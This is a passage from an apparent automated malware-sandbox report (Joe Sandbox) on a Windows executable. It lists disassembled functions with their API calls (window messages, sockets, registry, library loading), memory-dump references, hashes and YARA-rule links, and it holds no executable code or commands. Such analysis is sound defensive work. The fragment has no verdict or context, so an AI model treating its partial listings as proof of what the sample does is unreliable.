                                                                                  • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00B069AB
                                                                                  • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00B069D5
                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00B069E6
                                                                                  • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00B06A00
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: LongWindow$MessageSend
                                                                                  • String ID:
                                                                                  • API String ID: 2178440468-0
                                                                                  • Opcode ID: b3a99c7696e33eacb9a33f1b185668f3fa8ce0364fd4d8ae8875f2c1edf10b62
                                                                                  • Instruction ID: df985b2d245e2871dba1dbcb3ddb72bd54c058426e39806a46ef632dd293b302
                                                                                  • Opcode Fuzzy Hash: b3a99c7696e33eacb9a33f1b185668f3fa8ce0364fd4d8ae8875f2c1edf10b62
                                                                                  • Instruction Fuzzy Hash: BE313234644255AFEB20DF59DC88F643BE1FB4A350F2841A4F5048B6F1CB72ADA0CB91
                                                                                  Function 00ADE287 Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00ADE2CA
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00ADE2F0
                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 00ADE2F3
                                                                                  • SysAllocString.OLEAUT32(?), ref: 00ADE311
                                                                                  • SysFreeString.OLEAUT32(?), ref: 00ADE31A
                                                                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 00ADE33F
                                                                                  • SysAllocString.OLEAUT32(?), ref: 00ADE34D
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                  • String ID:
                                                                                  • API String ID: 3761583154-0
                                                                                  • Opcode ID: 2c0a95bb775f4a6c6abcb0ff436f9ce8829a99c2c6ad246364333d230e9494f2
                                                                                  • Instruction ID: 8e70a18063dcd7df48972f304eba26b2f8c1be48744780668bbe2e29d070e0c7
                                                                                  • Opcode Fuzzy Hash: 2c0a95bb775f4a6c6abcb0ff436f9ce8829a99c2c6ad246364333d230e9494f2
                                                                                  • Instruction Fuzzy Hash: 96212176614219AF9F10EFA8DC88DBA77BCEB09360B448126FA15DF350DA70ED858760
                                                                                  Function 00AF685E Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00AF8475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00AF84A0
                                                                                  • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00AF68B1
                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00AF68C0
                                                                                  • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00AF68F9
                                                                                  • connect.WSOCK32(00000000,?,00000010), ref: 00AF6902
                                                                                  • WSAGetLastError.WSOCK32 ref: 00AF690C
                                                                                  • closesocket.WSOCK32(00000000), ref: 00AF6935
                                                                                  • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00AF694E
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                                  • String ID:
                                                                                  • API String ID: 910771015-0
                                                                                  • Opcode ID: c1409b712568f8ec45f1c2adb030abdd5ed820b74c5ef14d381871395713ab15
                                                                                  • Instruction ID: 037d6459cf27c0fa40a6c3b52d669521cb046bd79eddfd46f1d699548ed44fcb
                                                                                  • Opcode Fuzzy Hash: c1409b712568f8ec45f1c2adb030abdd5ed820b74c5ef14d381871395713ab15
                                                                                  • Instruction Fuzzy Hash: 0031A471600118AFDB10AFA4CC85BBE77B9EB44765F048029FE05AB291DBB4AC458BA1
                                                                                  Function 00ADE360 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00ADE3A5
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00ADE3CB
                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 00ADE3CE
                                                                                  • SysAllocString.OLEAUT32 ref: 00ADE3EF
                                                                                  • SysFreeString.OLEAUT32 ref: 00ADE3F8
                                                                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 00ADE412
                                                                                  • SysAllocString.OLEAUT32(?), ref: 00ADE420
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                  • String ID:
                                                                                  • API String ID: 3761583154-0
                                                                                  • Opcode ID: 3741a4c96ec5283837bac1eff850bc6232f8bc37bd88cf53f3ae9de7860f60fe
                                                                                  • Instruction ID: 45967c014259f426cf56926702c843274e09f68cf6a83e8dc3a4538df22a4488
                                                                                  • Opcode Fuzzy Hash: 3741a4c96ec5283837bac1eff850bc6232f8bc37bd88cf53f3ae9de7860f60fe
                                                                                  • Instruction Fuzzy Hash: 06214775604104AFEB50FFA8DC89DAE77ECEB09360B408526F915CF3A0DA75EC818764
                                                                                  Function 00B07BF2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00A82111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00A8214F
                                                                                    • Part of subcall function 00A82111: GetStockObject.GDI32(00000011), ref: 00A82163
                                                                                    • Part of subcall function 00A82111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00A8216D
                                                                                  • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00B07C57
                                                                                  • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00B07C64
                                                                                  • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00B07C6F
                                                                                  • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00B07C7E
                                                                                  • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00B07C8A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$CreateObjectStockWindow
                                                                                  • String ID: Msctls_Progress32
                                                                                  • API String ID: 1025951953-3636473452
                                                                                  • Opcode ID: 91dd7314a185114b57b8e0d53b28dc9548a87ed4d37e763d47befa2e6490341f
                                                                                  • Instruction ID: 61e5ced6a60e8176f22935a1ef49664890ec8008a765679d7bc40547c4cf08c6
                                                                                  • Opcode Fuzzy Hash: 91dd7314a185114b57b8e0d53b28dc9548a87ed4d37e763d47befa2e6490341f
                                                                                  • Instruction Fuzzy Hash: B91186B1554219BEFF159F60CC85EE7BF5DEF08758F114115BA04A6090CB71AC21DBA4
                                                                                  Function 00AA9D16 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __init_pointers.LIBCMT ref: 00AA9D16
                                                                                    • Part of subcall function 00AA33B7: EncodePointer.KERNEL32(00000000), ref: 00AA33BA
                                                                                    • Part of subcall function 00AA33B7: __initp_misc_winsig.LIBCMT ref: 00AA33D5
                                                                                    • Part of subcall function 00AA33B7: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00AAA0D0
                                                                                    • Part of subcall function 00AA33B7: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00AAA0E4
                                                                                    • Part of subcall function 00AA33B7: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00AAA0F7
                                                                                    • Part of subcall function 00AA33B7: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00AAA10A
                                                                                    • Part of subcall function 00AA33B7: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00AAA11D
                                                                                    • Part of subcall function 00AA33B7: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00AAA130
                                                                                    • Part of subcall function 00AA33B7: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00AAA143
                                                                                    • Part of subcall function 00AA33B7: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00AAA156
                                                                                    • Part of subcall function 00AA33B7: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00AAA169
                                                                                    • Part of subcall function 00AA33B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00AAA17C
                                                                                    • Part of subcall function 00AA33B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00AAA18F
                                                                                    • Part of subcall function 00AA33B7: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00AAA1A2
                                                                                    • Part of subcall function 00AA33B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00AAA1B5
                                                                                    • Part of subcall function 00AA33B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00AAA1C8
                                                                                    • Part of subcall function 00AA33B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00AAA1DB
                                                                                    • Part of subcall function 00AA33B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00AAA1EE
                                                                                  • __mtinitlocks.LIBCMT ref: 00AA9D1B
                                                                                  • __mtterm.LIBCMT ref: 00AA9D24
                                                                                    • Part of subcall function 00AA9D8C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00AA9D29,00AA7EFD,00B3CD38,00000014), ref: 00AA9E86
                                                                                    • Part of subcall function 00AA9D8C: _free.LIBCMT ref: 00AA9E8D
                                                                                    • Part of subcall function 00AA9D8C: DeleteCriticalSection.KERNEL32(00B40C00,?,?,00AA9D29,00AA7EFD,00B3CD38,00000014), ref: 00AA9EAF
                                                                                  • __calloc_crt.LIBCMT ref: 00AA9D49
                                                                                  • __initptd.LIBCMT ref: 00AA9D6B
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00AA9D72
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                  • String ID:
                                                                                  • API String ID: 3567560977-0
                                                                                  • Opcode ID: 003e7ae8380d0f92ffa8a5a42378b9ec7a4817554eb24d77cdc94fabcf560873
                                                                                  • Instruction ID: e00c91f275d083daaa346851525c26a5e7bf3e10a00e2538969eca24e8af6fef
                                                                                  • Opcode Fuzzy Hash: 003e7ae8380d0f92ffa8a5a42378b9ec7a4817554eb24d77cdc94fabcf560873
                                                                                  • Instruction Fuzzy Hash: 75F090325197116EEB747B787D0369B76D4EF43770F20861AF550D70D3EF2089814191
                                                                                  Function 00AA41B9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00AA4282,?), ref: 00AA41D3
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00AA41DA
                                                                                  • EncodePointer.KERNEL32(00000000), ref: 00AA41E6
                                                                                  • DecodePointer.KERNEL32(00000001,00AA4282,?), ref: 00AA4203
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                  • String ID: RoInitialize$combase.dll
                                                                                  • API String ID: 3489934621-340411864
                                                                                  • Opcode ID: 652f0e9e0c91ab252b9b7e4eb6b6ff16ade4c3aa32b1377f13e9bcf2c4487b77
                                                                                  • Instruction ID: 72fd1a0465d303c781fa555d311e7d400cf06c574c0276c7d09ed78a67c5d21b
                                                                                  • Opcode Fuzzy Hash: 652f0e9e0c91ab252b9b7e4eb6b6ff16ade4c3aa32b1377f13e9bcf2c4487b77
                                                                                  • Instruction Fuzzy Hash: 73E012B4560B41AFDB202B70EC4DB943595B756B06F908524B411E70F0DFF552C88F04
                                                                                  Function 00AA428E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00AA41A8), ref: 00AA42A8
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00AA42AF
                                                                                  • EncodePointer.KERNEL32(00000000), ref: 00AA42BA
                                                                                  • DecodePointer.KERNEL32(00AA41A8), ref: 00AA42D5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                  • String ID: RoUninitialize$combase.dll
                                                                                  • API String ID: 3489934621-2819208100
                                                                                  • Opcode ID: b212274c9bfd3351d1fc5c2b3bdf9d18514633ac54085cc5c222b1bfa1228751
                                                                                  • Instruction ID: b845de99f921bb5eeee77b6b3462ef7386c22043c87de5c5fecc48b832087863
                                                                                  • Opcode Fuzzy Hash: b212274c9bfd3351d1fc5c2b3bdf9d18514633ac54085cc5c222b1bfa1228751
                                                                                  • Instruction Fuzzy Hash: 28E0B674560B00BBDB21AB60BD0DBC43AA4BB5AB06F908129F001E74F1DFF447C4CA14
                                                                                  Function 00A8218F Relevance: 9.3, APIs: 6, Instructions: 254COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetClientRect.USER32(?,?), ref: 00A821B8
                                                                                  • GetWindowRect.USER32(?,?), ref: 00A821F9
                                                                                  • ScreenToClient.USER32(?,?), ref: 00A82221
                                                                                  • GetClientRect.USER32(?,?), ref: 00A82350
                                                                                  • GetWindowRect.USER32(?,?), ref: 00A82369
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Rect$Client$Window$Screen
                                                                                  • String ID:
                                                                                  • API String ID: 1296646539-0
                                                                                  • Opcode ID: 2915c6700bad084a1a913d934b988d5fc9fe1072f530376f174007e40f44bfb3
                                                                                  • Instruction ID: 387ab62f6d015092b871b3e4e9fb259a027d70e09e0f35d95bac18050302a8cc
                                                                                  • Opcode Fuzzy Hash: 2915c6700bad084a1a913d934b988d5fc9fe1072f530376f174007e40f44bfb3
                                                                                  • Instruction Fuzzy Hash: 17B18A3991024ADBDF10DFA8C9807FEB7B1FF08310F148129ED59AB255EB70AA50CB64
                                                                                  Function 00AE6A73 Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memmove$__itow__swprintf
                                                                                  • String ID:
                                                                                  • API String ID: 3253778849-0
                                                                                  • Opcode ID: d64454222c26cb8bf762489de01ddacca6189937e32c11841e75ba2062f97503
                                                                                  • Instruction ID: fe5ef885939191d549e2184630452d437aa04394730a4170be6c62479aeca92e
                                                                                  • Opcode Fuzzy Hash: d64454222c26cb8bf762489de01ddacca6189937e32c11841e75ba2062f97503
                                                                                  • Instruction Fuzzy Hash: F561DE3050069AABCF11FF61CE82EFE37A8AF59388F044959F9596B292DB309D45CB50
                                                                                  Function 00B00844 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77
                                                                                    • Part of subcall function 00B0147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B0040D,?,?), ref: 00B01491
                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B0091D
                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B0095D
                                                                                  • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00B00980
                                                                                  • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00B009A9
                                                                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00B009EC
                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00B009F9
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                  • String ID:
                                                                                  • API String ID: 4046560759-0
                                                                                  • Opcode ID: 84111e30e923469819e95a7ae769d187b3a08aa7b6da308c3dbf96ba80e8e5e3
                                                                                  • Instruction ID: d41cdd7df34c62ad69f7e4a772a5269117f1e592709555cc55fe739ef412e2c4
                                                                                  • Opcode Fuzzy Hash: 84111e30e923469819e95a7ae769d187b3a08aa7b6da308c3dbf96ba80e8e5e3
                                                                                  • Instruction Fuzzy Hash: 36517831218205AFD714EF68C985E6EBBE9FF89314F04495DF485872A2EB31E905CB52
                                                                                  Function 00B05DD6 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetMenu.USER32(?), ref: 00B05E38
                                                                                  • GetMenuItemCount.USER32(00000000), ref: 00B05E6F
                                                                                  • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00B05E97
                                                                                  • GetMenuItemID.USER32(?,?), ref: 00B05F06
                                                                                  • GetSubMenu.USER32(?,?), ref: 00B05F14
                                                                                  • PostMessageW.USER32(?,00000111,?,00000000), ref: 00B05F65
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Menu$Item$CountMessagePostString
                                                                                  • String ID:
                                                                                  • API String ID: 650687236-0
                                                                                  • Opcode ID: ad3511584892b5946a1ce125c4d051a51d2fd2526248b7056c83c58ad5337394
                                                                                  • Instruction ID: 149042c4f544b643ec68af490853258ae1d1179449eda268dd692bd2865f55c6
                                                                                  • Opcode Fuzzy Hash: ad3511584892b5946a1ce125c4d051a51d2fd2526248b7056c83c58ad5337394
                                                                                  • Instruction Fuzzy Hash: EF517035A0161AAFCF21EF64C945AAEBBF5EF48310F104099F905BB391DB74AE418F90
                                                                                  Function 00ADF688 Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • VariantInit.OLEAUT32(?), ref: 00ADF6A2
                                                                                  • VariantClear.OLEAUT32(00000013), ref: 00ADF714
                                                                                  • VariantClear.OLEAUT32(00000000), ref: 00ADF76F
                                                                                  • _memmove.LIBCMT ref: 00ADF799
                                                                                  • VariantClear.OLEAUT32(?), ref: 00ADF7E6
                                                                                  • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00ADF814
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
